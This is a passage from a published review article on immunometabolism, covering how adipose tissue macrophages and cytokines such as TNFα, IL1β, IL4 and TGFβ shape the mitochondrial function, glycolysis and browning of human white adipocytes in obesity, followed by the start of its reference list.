(95). Visceral adipocytes show lower mitochondrial activity than subcutaneous, when calculated per cell and normalized for mitochondrial content (99, 100). When comparing isolated mitochondria from subcutaneous and visceral adipocytes, no significant difference in mitochondrial function was observed (9). This indicates that differences in energy metabolism between visceral and subcutaneous adipocytes, and WAT depots, do not depend on intrinsic mitochondrial capacity. Instead, cellular capacity of OXPHOS may depend on mitochondrial mass per cell (e.g. higher mitochondrial density in visceral than subcutaneous adipocytes (99)), the control of mitochondrial function at the cellular level (e.g. higher beta-3 adrenergic receptor mRNA levels in viscWAT than in scWAT (101)) and the depot-specific surrounding (e.g. higher vascularization in viscWAT than scWAT (102)), including the inflammatory environment created by MΦ (higher concentration of cytokines such as IL6 in viscWAT than scWAT (103)). Upon adrenergic activation, subcutaneous adipocytes of lean humans display increased OCR that associates with increased lipolysis (13). In parallel, extracellular acidification rates (ECARs), which estimate glycolytic activity, are increased (13). Notably, the extracellular acidification may also derive from increased carbon dioxide production of the TCA cycle (dissolved as carbonic acid), and therefore, partially unrelated to glycolysis. Insulin stimulation of subcutaneous adipocytes from obese donors leads to increased glycolytic activity and simultaneously, to decreased ATP-linked respiration (104). Whether this response is different in adipocytes from lean donors, or different in visceral adipocytes, needs to be determined. Overall, the high capacity of mitochondrial OXPHOS, that is linked to trigacylglycerol/FA cycling activity and induced by hormones and nutrients, is essential for metabolic flexibility of WAT (105, 106, 107), representing a marker of healthy adipocytes (Fig. 2). Obesity-induced changes in the bioenergetics of white adipocytes Decreased mitochondrial function in white adipocytes leads to dysfunction in lipid storage and endocrine Figure 2 The dynamics of adipocyte energy metabolism. Oxygen consumption rates (OCRs), representing mitochondrial function, are plotted against extracellular acidification rates (ECARs), representing an estimate for glycolytic activity. Both pathways fuel cellular ATP demands, are complementary and display metabolic flexibility, in particular in healthy, lean adipocytes (orange). Preadipocytes (yellow) display lower OCR, higher ECAR and less metabolic flexibility. During adipogenic differentiation, glycolytic ATP production is replaced by oxidative phosphorylation (OXPHOS). OXPHOS increases about five-fold, and its contribution to cellular ATP increases from 15% in preadipocytes (yellow circle) to ~60% in adipocytes (orange circle) under basal, normoglycemic conditions. Adipocytes in lean WAT display high flexibility of OCR and ECAR, depending on nutrient availability (e.g. glucose: 45% OXPHOS in hyperglycemic (green circle) and 73% OXPHOS in hypoglycemic (blue circle) conditions), depending on hormonal input (e.g. catecholamine (brown circle) induces simultaneous glycolysis and OXPHOS = increased metabolic activity; insulin (green circle) suppresses OXPHOS and increases glycolysis = metabolic shift), and depending on inflammatory mediators (e.g. TNFα (pink circle) is suspected to reduce OCR and ECAR = metabolic depression). This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R110 PB–R17 8:6 function of WAT (2, 6) that associate with obesity-induced metabolic complications such as insulin resistance (108) (Fig. 3). Several studies demonstrate reduced mitochondrial content and activity of subcutaneous and visceral adipocytes from obese donors (9, 10, 12, 13, 109) independent of fat cell size (9, 12). Furthermore, subcutaneous adipocytes from obese donors show lower OCR responses after β-adrenergic stimulation as compared to lean individuals (13). The depression of ATP metabolism in adipocytes from obese donors is supported by data on lower mitochondrial activity, reduced lipid accumulation and insulin-stimulated glucose uptake, as compared to SGBS adipocytes, which represent a model for lean, insulin-sensitive human white subcutaneous adipocytes (110). In line with these observations, previous studies on basal heat production of primary (‘floating’) adipocytes from lean vs obese humans revealed an obesity-related reduction in heat output by ~50% (111). Interestingly, not only impaired mitochondrial function but also altered glycolytic activity in adipocytes is associated with obesity. Higher lactate secretion of WAT from obese patients has been reported previously, indicating higher glycolytic fluxes, impaired conversion of lactate to pyruvate and/or impaired pyruvate import into the mitochondria (1, 112, 113). This is in line with suggestions on the increased requirement of glycolytic energy production during insulin resistance (114). Under hypoxic condition, adipocytes show increased glucose uptake, leading to glycogen accumulation that has been linked to impaired adipokine secretion (115). Additionally, mitochondrial uncoupling in adipocytes, either induced by overexpressing uncoupling protein 1 (UCP1) or by administration of chemical uncouplers such as FCCP, results in less ATP yield from OXPHOS. This is usually compensated by the increase of glycolytic energy production. If the compensation fails to maintain ATP homeostasis, adipocytes show reduced lipid accumulation, possibly by diverting glucose-derived carbon flux away from fatty acid synthesis into lactate production (116, 117, 118, 119). This reduction in lipid accumulation capacity of adipocytes may lead to the adverse lipid accumulation in other organs (e.g. NAFLD), a commonly seen feature in metabolically unhealthy obese patients (120). Thus, appropriate functionality, balance and regulation of the main energy-producing pathways, oxidative phosphorylation and glycolysis, is important for metabolic flexibility to retain healthy adipocytes. Any perturbation of these metabolic processes leads to metabolic imbalances and adverse outcomes for the whole metabolic system of the body. In summary (Fig. 3), healthy adipocytes possess the adequate mitochondrial mass and activity, allowing a wide scope of metabolic responses to hormones such as insulin and adrenaline. Mitochondrial function is required for insulin-stimulated glucose metabolism and adrenergic-stimulated OXPHOS capacity, allowing for rapid adjustments of energy metabolism. Obesity is characterized by lower mitochondria number and activity, altered basal/insulin-stimulated glucose metabolism and Figure 3 Obesity-associated impaired energy metabolism in white adipocytes. In lean WAT, high mitochondrial mass and activity in adipocytes allow for high metabolic flexibility. OXPHOS and glycolysis are adjusted in response to hormonal regulation (insulin and adrenergic activation). Visceral adipocytes display lower mitochondrial activity than subcutaneous adipocytes (normalize per cell and mitochondrial content). Contrasting lean WAT, obese WAT is characterized by lower mitochondrial mass and activity, impaired glucose metabolism and dampened hormonal responses. Obesity overall renders adipocytes metabolically inflexible. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R1118:6 lower adrenergic-stimulated OXPHOS. Therefore, it is not surprising that unhealthy adipocytes are less metabolically flexible. Linking ATMΦ to human adipocyte bioenergetics Metabolically healthy (vs unhealthy) obesity is characterized by dampened inflammatory molecular signatures in WAT and lower levels of circulating inflammation markers (TNFα and hCRP) (121, 122, 123, 124). Together, this indicates the link between inflammation and dysregulated metabolism. Early observations by Weisberg et al. that showed obesity- associated increases in ATMΦ content, also reported on the decreased expression of several mitochondria-related genes (24). Cytokines are potential candidates mediating the crosstalk between ATMΦ and the energy metabolism of adipocytes (Fig. 4). Typical cytokines involved in WAT inflammation are TNFα, IL6 and IL1β. These cytokines promote insulin resistance and/or induce lipolysis (125, 126, 127, 128). Notably, some of these and other cytokines suppress mitochondrial function (22) (Fig. 4B). The crosstalk between ATMΦ and adipocytes is certainly bidirectional, and dysfunctional adipose mitochondria possibly promote WAT inflammation as well (129). This review, however, will focus on the effects of ATMΦ in controlling adipocyte mitochondria. In vivo, the paracrine interactions between ATMΦ and adipose cells are complex, as MΦ are very dynamic cells with a changing cytokine profile that is influenced by adipokines (130, 131), sympathetic nerve activation (132), as well as insulin and nutrients (83). ATMΦ could represent a distinct subpopulation in WAT with a unique, not yet fully characterized phenotype that is altered during obesity (as discussed in the sections above). Thus, studying ex vivo the effects of MΦ-conditioned media, which represent the global secretome of MΦ, provides only a rudimentary picture of the effects that MΦ-derived products impose on fat cell bioenergetics. This ex vivo system, however, enables us to identify the factors, signaling pathways and mechanisms that can be further investigated and targeted in vivo to modulate mitochondrial function of adipocytes. ATMΦ and secreted factors affect glucose metabolism/glycolysis of adipocytes Using conditioned media from LPS-activated MΦ (MΦ- CM), Lumeng et al. observed higher basal glucose uptake in adipocytes in a murine cell culture system (3T3-L1 adipocytes and RAW264.7 or J774 macrophages) (133). In line with this, we demonstrated higher glycolytic activity in adipocytes after incubation with either LPS/INFγ-activated MΦ-CM or IL10/TGFβ-activated MΦ-CM (34), using a human model system composed of SGBS cells, a human subcutaneous adipocyte model Figure 4 Control of adipocyte energy metabolism. In the WAT-specific environment (yellow background), multiple cytokines/chemokines, metabolites, lipid species and hormones from diverse cell types within WAT and/or circulation can exert either positive (upper box, A) or negative (lower box, B) effects on WAT metabolism. These factors control mitochondrial function of (pre-)adipocytes either directly and/or indirectly by first affecting the ATMΦ secretion profile. Notably, the composition of released factors depends on MΦ activation (known for factors written in blue/green). Depending on the TGFβ superfamily (BMPs and GDFs), WAT metabolism is either promoted or suppressed. A recently identified but controversially discussed mechanism of MΦ invoked browning and enhanced WAT metabolism is the secretion of catecholamine by IL4-activated MΦ during cold and exercise (upper box, A). On the contrary, NAMs/SAMs (lower box, B), which represent MΦ in close proximity of neurons/axons, may reduce local catecholamine levels and thus suppress mitochondrial function of adipocytes with age and obesity. This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R112 PB–R17 8:6 and THP1 cells, a human monocytic cell line that can be differentiated into MΦ and subsequently activated with different stimuli (134). Overall, ATMΦ possess the potential to increase basal glucose uptake in adipocytes. The potential responsible factors comprise the classical inflammatory cytokines which are associated with obese WAT inflammation, such as TNFα and IL1β. Controversial reports exist for IL6, which is a cytokine that has often been associated with WAT inflammation (22, 57, 135). Furthermore, a few studies report on reduced insulin- stimulated glucose uptake after exposing adipocytes to either different MΦ-CM, or to cytokines, such as TNFα, CCL2 and IL1β, which are mostly linked to the decreased activation of insulin signaling cascades (35, 128, 133, 136, 137). Of note, many studies show the percentage or fold- changes of glucose uptake vs vehicle (0 nM insulin), not fully excluding the possibility that the reduced response in these studies may be due to increased basal glucose uptake, at least partially. The molecular identity of ATMΦ released factors reducing adipose energy metabolism Maintenance of cellular homeostasis requires a constant production of ATP unless specific, energy-demanding tasks are performed. Therefore, increased basal glucose uptake may report increased energy demand. However, increased basal glucose uptake may equally report a compensatory mechanism to counter fit decreased OXPHOS activity (ATP-linked respiration). The latter scenario describes a switch in the energy producing pathways, rather than the increase in metabolic activity. IL10/TGFβ-activated MΦ and/or IL1β promote such a metabolic switch in adipocytes by increasing glucose uptake/glycolysis while simultaneously decreasing mitochondrial activity (22, 34) (Fig. 4B). IL1β also inhibits cAMP- and isoproterenol-induced PGC1a and UCP1 mRNA levels (138, 139), further supporting the IL1β signaling pathway in suppressing oxidative metabolism of adipocytes. TNFα represents a cytokine that appears to reduce major energy-producing pathways, glycolysis and OXPHOS. The lowering in production of cellular energy subsequently results in adipocyte death, finally seen as the loss of mitochondrial membrane potential and cleaved caspase-3 (22). Notably, TNFα levels and mitochondrial mass correlate negatively in human WAT (129, 140). Whether the secretome of the ‘metabolically’ activated MΦ in obese WAT (83) is significantly involved in decreased adipose mitochondrial function is not known as yet (Fig. 4B). ATMΦ and their secreted factors may, however, not only directly affect adipocyte energy metabolism, but also indirectly by altering neuronal signals into the tissue. One of those signals is catecholamine, which enhances energy dissipation. Two mechanisms have been described how MΦ may limit bioactive catecholamine in WAT and brown adipose tissue (BAT): One mechanism proposes the inhibition of neuronal innervation. BAT-specific MΦ inhibit sympathetic neuronal innervation and thereby impair catecholamine signaling in BAT, while WAT innervation is not affected (141). The other mechanism proposes neurotransmitter clearance. A distinct MΦ-type that is attached, or at least in close proximity, to axons of the SNS takes up and degrades norepinephrine (NE). These MΦ have been termed either sympathetic neuron- associated MΦ (SAMs) (30) or nerve-associated MΦ (NAMs) (142). So far, SAMs/NAMs have been identified in murine viscWAT (142) and scWAT (30), but not unequivocally in murine BAT (30). SAMs/NAMs may regulate local catecholamine concentrations and prevent catecholamine spill over into the circulation (30, 142, 143). The MΦ- mediated NE uptake and degradation system is apparently enhanced during obesity (increased number of SAMs (30)) and aging (GDF3-dependent increased expression of genes controlling NE degrading in NAMs (142)), and potentially contribute to decreased energy metabolism with age and obesity (Fig. 4B). Mediators between ATMΦ and increased adipose energy metabolism The interaction between ATMΦ and increased WAT energy metabolism is supported by mouse models that claim the involvement of MΦ in the ‘browning’ of WAT upon cold exposure, exercise and caloric restriction (26, 27, 28, 144, 145) (Fig. 4A). Browning of WAT has been classically defined as the upregulation of uncoupling protein 1 (UCP1) and the appearance of multilocular adipocytes in WAT, termed beige adipocytes. Beige adipocytes associate with mitochondrial biogenesis and higher energy turnover. UCP1 resides in the mitochondrial inner membrane and uncouples the proton motive force from ATP synthesis, thereby directly releasing energy as heat and accelerating catabolic processes. With this energy-burning machinery, the browning of WAT can restore dysregulated glucose and lipid metabolism in diverse obese and diabetic mouse models (26, 27, 28, 146). With these observations in mouse models, browning-inducing pathways have gained remarkable attention in biomedicine to treat metabolic diseases. In the context of browning, ATMΦ may release This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R1138:6 cytokines, which could induce UCP1 expression, higher energy turnover and energy wasting in adipocytes (Fig. 4A). Several publications implicate IL6 signaling in beige adipocyte formation and WAT browning (147, 148, 149), but some aspects of IL6-stimulated glucose uptake are controversial (147, 148, 149, 150). Another cytokine that affects WAT energy metabolism, either directly or via MΦ, is IL4 (Fig. 4A). IL4 is secreted by MΦ and to a higher extent by eosinophils in WAT (26). It may directly control WAT metabolism, by acting either on preadipocytes to promote differentiation into beige adipocytes, or on adipocytes to induce higher ATP turnover (151, 152). Several publications place IL4-activated MΦ into immune signaling cascades that are able to induce UCP1 expression and mitochondrial activity in adipocytes. The IL4-MΦ axis can be modulated by additional factors of endocrine (e.g. released distantly from muscle (27)) and/or paracrine nature (e.g. released adjacently from other WAT cell types, including eosinophils, type 2 innate lymphoid cells, regulatory and natural killer T cells (26, 153, 154)). The underlying mechanisms how the IL4- MΦ system induces browning is not fully understood. In particular, the involvement of catecholamine-producing ATMΦ is controversially discussed (28, 29). Although some reports on catecholamine synthesis in MΦ exist (143, 155, 156), the physiological contribution during cold-induced thermogenesis seems to be of minor importance (29). Whether MΦ-mediated uptake (143) or degradation of catecholamines (as shown for SAMs/NAMs (30, 142)) is inhibited and substantially contributes to cold-induced WAT browning requires further investigations. Additional candidates that impact mitochondrial function in adipocytes belong to the TGFβ superfamily. TGFβ3 inhibits the ‘browning’ of WAT and stimulates proliferation of white adipocytes (150, 157, 158, 159). Our functional work demonstrated that IL10/TGFβ-activated MΦ secreted factors decrease ATP-linked respiration in human subcutaneous adipocytes, thus providing evidence for indirect suppression of mitochondrial respiration by TGFβ (34). Several other members of the TGFβ superfamily have been proposed in the regulation of oxidative metabolism in adipocytes and the browning of WAT, affecting whole body energy metabolism. Many of these factors are indeed secreted by MΦ. Whether these factors promote or suppress energy metabolism depends on the distinct factor or receptor, as well as on the adipose depot (BAT or WAT). Examples for specific effects include bone morphogenetic proteins (BMP 2, 4, 7 and 8b) (160, 161, 162, 163, 164, 165, 166) and growth differentiation factors (GDF 1, 3, 5, 15) (142, 167, 168, 169, 170, 171, 172) (Fig. 4A and B). The effects also depend on the developmental stage of the adipocytes, whether the cytokine acts directly on the mesenchymal stem cell, on the early committed preadipocytes (brown, beige or white) or on the adipocytes, or whether the cytokine acts indirectly by changing MΦ infiltration and their phenotype (170, 173). Additionally, there are reports that these cytokines act on the central nervous system to control metabolism (164, 174). Other mediators between ATMΦ and adipocyte metabolism are metabolites. Upon activation, MΦ change their metabolomic profile (175, 176), for example upon LPS activation, more lactate and pyruvate are released (176). Lactate and acetate have been suggested as inducers of WAT browning (177, 178, 179). Lipid mediators (e.g. oleoylethanolamine (OEA), prostaglandin E2 (PGE2)) are differentially released by MΦ, depending on the mode of activation (180, 181, 182). Circulating metabolites and lipid mediators are involved in the browning of rodent WAT (177, 183, 184), indicating that these factors represent additional candidates by which MΦ modulate mitochondrial activity in white adipocytes (Fig. 4A). Although MΦ may not be the main source for some cytokines or factors that have been linked to increased or decreased energy expenditure in WAT (e.g. IFNγ, retinoic acid, catecholamine, IL17, lactate), the indirect involvement of these factors cannot be formally excluded (29, 34, 185, 186, 187, 188). For instance, we have recently found increased ATP-linked respiration in white adipocytes after exposure to the secreted factors of LPS/IFNγ-activated MΦ (34) (Fig. 4A). In summary (Fig. 4), ATMΦ can be activated by the WAT-specific microenvironment which is impacted by circulating endocrine and auto-/paracrine factors (cytokines, nutrients and hormones). Thus, the WAT- specific environment is characterized by distinctly activated ATMΦ and MΦ-secreted factors which contribute to the microenvironment but furthermore and the regulation of WAT energy metabolism. During cold, exercise and fasting, the induction of adipose energy metabolism by enhancing beige adipocyte differentiation, inducing UCP1 expression, increasing ATP turnover and/or increasing energy dissipating pathways such as catecholamine can be mediated by activated MΦ (e.g. LPS/IFNγ- or IL4-activated MΦ) and MΦ released factors such as cytokines (IL4, IL6), metabolites (lactate, acetate) and/or lipid mediators (PGE2, OEA) (Fig. 4A). In the obese state, other activated MΦ (e.g. IL10/TGFβ- or ‘metabolically’ activated MΦ) and MΦ released factors such as cytokines (e.g. IL1β and TNFα) may decrease energy This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R114 PB–R17 8:6 metabolism of adipocytes or limit local energy dissipating pathways by uptake and degradation of catecholamine (by SAM, NAM) (Fig. 4B). Several scenarios how these factors operate are conceivable, and they most likely overlap and work in concert, by direct action on mesenchymal stem cells, preadipocytes and adipocytes and by indirect signals via MΦ. Indirect action may also occur via additional cell types in WAT, including other immune cells (e.g. T cells), epithelial cells and neurons (not depicted in Fig. 4). Conclusion and outlook In the upcoming field of immunometabolism, which investigates the crosstalk between immune cell function and metabolic homeostasis, the understanding on paracrine regulation of human white adipocyte metabolism by ATMΦ, is utterly important. By identifying the ATMΦ-secreted factors that control mitochondrial function and energy metabolism in adipocytes, we may be able to find novel therapeutic targets to treat diseased WAT during obesity. This new understanding of the metabolic network in WAT needs to be resolved on the molecular level, investigating how controlling pathways are regulated under physiological and pathophysiological conditions. A detailed investigation is required on the ATMΦ phenotypes/subpopulations and how fat depot-, gender- and age-specific ATMΦ infiltration and activation are related to adipocytes, WAT and whole body metabolism in health and disease. Although this review focuses on the paracrine action of MΦ within the white adipose tissue, it should be considered that ATMΦ contribute to the overall secretion profile of WAT with factors that are released into the circulation for endocrine action causing systemic effects such as insulin resistance. It is feasible to speculate that these factors will not only impact the energy metabolism of adipocytes, but also as endocrine factors potentially impact the bioenergetics of other more distantly located target cells (such as hepatocytes and myocytes). Furthermore, not only MΦ composition changes with obesity, but other immune cells, such as T cell, B cell, eosinophil, iNKT and neutrophils change in number and activation state, contributing to the impaired immune balance in obese WAT. Thus, the complex microenvironment of adipose tissue that controls the bioenergetics of adipocytes is composed of multiple cytokines and cell types with multiple cellular targets. Additionally, there is potentially a feed-back mechanism in place where adipocyte-secreted proteins and signals impact the immune cell secretome that in turn controls adipocyte metabolism. How the endocrine and nervous system that regulates metabolism (e.g. catecholamine, acetylcholine, insulin and glucagon) affects the crosstalk of ATMΦ and fat cells represents another promising research topic. Many other aspects require further investigation, concerning cytokine production and combinatorial effects on adipocytes, the interaction with energy storing and dissipating pathways, as well as the crosstalk between adipocytes and cell types other than ATMΦ to control adipocyte glycolysis and mitochondrial function. Owing to the profound differences in the immune system between mice and humans, it is of major importance to consolidate murine pathways and their impact on metabolism in humans. That said, however, it is promising that certain activated MΦ not only induce energy-producing pathways (glycolysis and OXPHOS) in white adipocytes, but possibly in an UCP1-independent manner, suggesting new options to increase energy expenditure by targeting inflammatory pathways in WAT. Novel strategies in obesity therapy are required as obese and older subjects are usually characterized by the absence or low content of BAT (UCP1+-cells) (189). Whether the browning capacity of human subcutaneous WAT can be enhanced to that extent that it eventually contributes significantly to systemic energy expenditure, is still an open question (190, 191). Beyond energy wasting in adipocytes, mitochondria are crucial for all cellular pathways (e.g. differentiation, apoptosis, energy dissipation, adipokine secretion), thus representing ubiquitous targets to treat obesity and its associated disorders. Collectively, targeting inflammatory pathways in fat depots could be a feasible strategy for the treatment of metabolic diseases. Declaration of interest The author declares that there is no conflict of interest that could be perceived as prejudicing the impartiality of this review. Funding The original work of M K was supported by the German Center for Diabetes Research (DZD) and the German Diabetes Association (DDG). Acknowledgments The author would like to thank Martin Jastroch for helpful comments on the manuscript and proofreading. Figures were created using modified components from Servier Medical Art (https://smart.servier.com). This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:28PM via free access https://smart.servier.com https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0016 https://ec.bioscientifica.com M Keuper Inflammatory control of adipocyte bioenergetics R1158:6 References 1 Jansson PA, Larsson A, Smith U & Lönnroth P. Lactate release from the subcutaneous tissue in lean and obese men. Journal of Clinical Investigation 1994 93 240–246. (https://doi.org/10.1172/JCI116951) 2 Kershaw EE & Flier JS. Adipose tissue as an endocrine organ. Journal of Clinical Endocrinology and Metabolism 2004 89 2548–2556. (https:// doi.org/10.1210/jc.2004-0395) 3 Trayhurn P. Endocrine and signalling role of adipose tissue: new perspectives on fat. Acta Physiologica Scandinavica 2005 184 285–293. (https://doi.org/10.1111/j.1365-201X.2005.01468.x) 4 Kaaman M, Sparks LM, van Harmelen V, Smith SR, Sjölin E, Dahlman I & Arner P. Strong association between mitochondrial DNA copy number and lipogenesis in human white adipose tissue. Diabetologia 2007 50 2526–2533. (https://doi.org/10.1007/s00125- 007-0818-6) 5 Kusminski CM & Scherer PE. Mitochondrial dysfunction in white adipose tissue. Trends in Endocrinology and Metabolism 2012 23 435–443. (https://doi.org/10.1016/j.tem.2012.06.004) 6 Koh EH, Park JY, Park HS, Jeon MJ, Ryu JW, Kim M, Kim SY, Kim MS, Kim SW, Park IS, et al. Essential role of mitochondrial function in adiponectin synthesis in adipocytes. Diabetes 2007 56 2973–2981. (https://doi.org/10.2337/db07-0510) 7 Wang CH, Wang CC, Huang HC & Wei YH. Mitochondrial dysfunction leads to impairment of insulin sensitivity and adiponectin secretion in adipocytes. FEBS Journal 2013 280 1039–1050. (https://doi.org/10.1111/febs.12096) 8 Szkudelski T, Nogowski L & Szkudelska K. Short-term regulation of adiponectin secretion in rat adipocytes. Physiological Research 2011 60 521–530. 9 Yin X, Lanza IR, Swain JM, Sarr MG, Nair KS & Jensen MD. Adipocyte mitochondrial function is reduced in human obesity independent of fat cell size. Journal of Clinical Endocrinology and Metabolism 2014 99 E209–E216. (https://doi.org/10.1210/jc.2013-3042) 10 Heinonen S, Buzkova J, Muniandy M, Kaksonen R, Ollikainen M, Ismail K, Hakkarainen A, Lundbom J, Lundbom N, Vuolteenaho K, et al. Impaired mitochondrial biogenesis in adipose tissue in acquired obesity. Diabetes 2015 64 3135–3145. (https://doi.org/10.2337/db14-1937) 11 Pietiläinen KH, Naukkarinen J, Rissanen A, Saharinen J, Ellonen P, Keränen H, Suomalainen A, Götz A, Suortti T, Yki-Järvinen H, et al. Global transcript profiles of fat in monozygotic twins discordant for BMI: pathways behind acquired obesity. PLoS Medicine 2008 5 e51. (https://doi.org/10.1371/journal.pmed.0050051) 12 Fischer B, Schöttl T, Schempp C, Fromme T, Hauner H, Klingenspor M & Skurk T. Inverse relationship between body mass index and mitochondrial oxidative phosphorylation capacity in human subcutaneous adipocytes. American Journal of Physiology: Endocrinology and Metabolism 2015 309 E380–E387. (https://doi. org/10.1152/ajpendo.00524.2014) 13 Yehuda-Shnaidman E, Buehrer B, Pi J, Kumar N & Collins S. Acute stimulation of white adipocyte respiration by PKA-induced lipolysis. Diabetes 2010 59 2474–2483. (https://doi.org/10.2337/db10-0245) 14 Hotamisligil GS, Shargill NS & Spiegelman BM. Adipose expression of tumor necrosis factor-alpha: direct role in obesity-linked insulin resistance. Science 1993 259 87–91. (https://doi.org/10.1126/ science.7678183) 15 Xu H, Barnes GT, Yang Q, Tan G, Yang D, Chou CJ, Sole J, Nichols A, Ross JS, Tartaglia LA, et al. Chronic inflammation in fat plays a crucial role in the development of obesity-related insulin resistance. Journal of Clinical Investigation 2003 112 1821–1830. (https://doi. org/10.1172/JCI19451) 16 Cai D, Yuan M, Frantz DF, Melendez PA, Hansen L, Lee J & Shoelson SE. Local and systemic insulin resistance resulting from hepatic activation of IKK-beta and NF-kappaB. Nature Medicine 2005 11 183–190. (https://doi.org/10.1038/nm1166) 17 Lanthier N, Molendi-Coste O, Horsmans Y, van Rooijen N, Cani PD & Leclercq IA. Kupffer cell activation is a causal factor for hepatic insulin resistance. American Journal of Physiology: Gastrointestinal and Liver Physiology 2010 298 G107–G116. (https://doi.org/10.1152/ ajpgi.00391.2009) 18 Saghizadeh M, Ong JM, Garvey WT, Henry RR & Kern PA. The expression of TNF alpha by human muscle. Relationship to insulin resistance. Journal of Clinical Investigation 1996 97 1111–1116. (https://doi.org/10.1172/JCI118504) 19 De Souza CT, Araujo EP, Bordin S, Ashimine R, Zollner RL, Boschero AC, Saad MJ & Velloso LA. Consumption of a fat-rich diet activates a proinflammatory response and induces insulin resistance in the hypothalamus. Endocrinology 2005 146 4192–4199. (https:// doi.org/10.1210/en.2004-1520) 20 Ehses JA, Perren A, Eppler E, Ribaux P, Pospisilik JA, Maor-Cahn R, Gueripel X, Ellingsgaard H, Schneider MKJ, Biollaz G, et al. Increased number of islet-associated macrophages in type 2 diabetes. Diabetes 2007 56 2356–2370. (https://doi.org/10.2337/db06-1650) 21 Bondia-Pons I, Ryan L & Martinez JA. Oxidative stress and inflammation interactions in human obesity. Journal of Physiology and Biochemistry 2012 68 701–711. (https://doi.org/10.1007/s13105-012- 0154-2) 22 Hahn WS, Kuzmicic J, Burrill JS, Donoghue MA, Foncea R, Jensen MD, Lavandero S, Arriaga EA & Bernlohr DA. Proinflammatory cytokines differentially regulate adipocyte mitochondrial metabolism, oxidative stress, and dynamics. American Journal of Physiology: Endocrinology and Metabolism 2014 306 E1033–E1045. (https://doi.org/10.1152/ajpendo.00422.2013) 23 Qatanani M, Tan Y, Dobrin R, Greenawalt DM, Hu G, Zhao W, Olefsky JM, Sears DD, Kaplan LM & Kemp DM. Inverse regulation of inflammation and mitochondrial function in adipose tissue defines extreme insulin sensitivity in morbidly obese patients. Diabetes 2013 62 855–863. (https://doi.org/10.2337/db12-0399) 24 Weisberg SP, McCann D, Desai M, Rosenbaum M, Leibel RL & Ferrante AW. Obesity is associated with macrophage accumulation in adipose tissue. Journal of Clinical Investigation 2003 112 1796–1808. (https://doi.org/10.1172/JCI19246) 25 Wernstedt Asterholm I, Tao C, Morley TS, Wang QA, Delgado- Lopez F, Wang ZV & Scherer PE. Adipocyte inflammation is essential for healthy adipose tissue expansion and remodeling. Cell Metabolism 2014 20 103–118. (https://doi.org/10.1016/j. cmet.2014.05.005) 26 Qiu Y, Nguyen KD, Odegaard JI, Cui X, Tian X, Locksley RM, Palmiter RD & Chawla A. Eosinophils and type 2 cytokine signaling in macrophages orchestrate development of functional beige fat. Cell 2014 157 1292–1308. (https://doi.org/10.1016/j.cell.2014.03.066) 27 Rao RR, Long JZ, White JP, Svensson KJ, Lou J, Lokurkar I, Jedrychowski MP, Ruas JL, Wrann CD, Lo JC, et al. Meteorin-like is a hormone that regulates immune-adipose interactions to increase beige fat thermogenesis. Cell 2014 157 1279–1291. (https://doi. org/10.1016/j.cell.2014.03.065) 28 Nguyen KD, Qiu Y, Cui X, Goh YPS, Mwangi J, David T, Mukundan L, Brombacher F, Locksley RM & Chawla A. Alternatively activated macrophages produce catecholamines to sustain adaptive thermogenesis. Nature 2011 480 104–108. (https://doi.org/10.1038/ nature10653) 29 Fischer K, Ruiz HH, Jhun K, Finan B, Oberlin DJ, van der Heide V, Kalinovich AV, Petrovic N, Wolf Y, Clemmensen C, et al. Alternatively activated macrophages do not synthesize catecholamines or contribute to adipose tissue adaptive thermogenesis. Nature Medicine 2017 23 623–630. (https://doi.org/10.1038/nm.4316) 30 Pirzgalska RM, Seixas E, Seidman JS, Link VM, Sánchez NM, Mahú I, Mendes R, Gres V, Kubasova N, Morris I, et al. Sympathetic neuron- associated macrophages contribute to obesity by 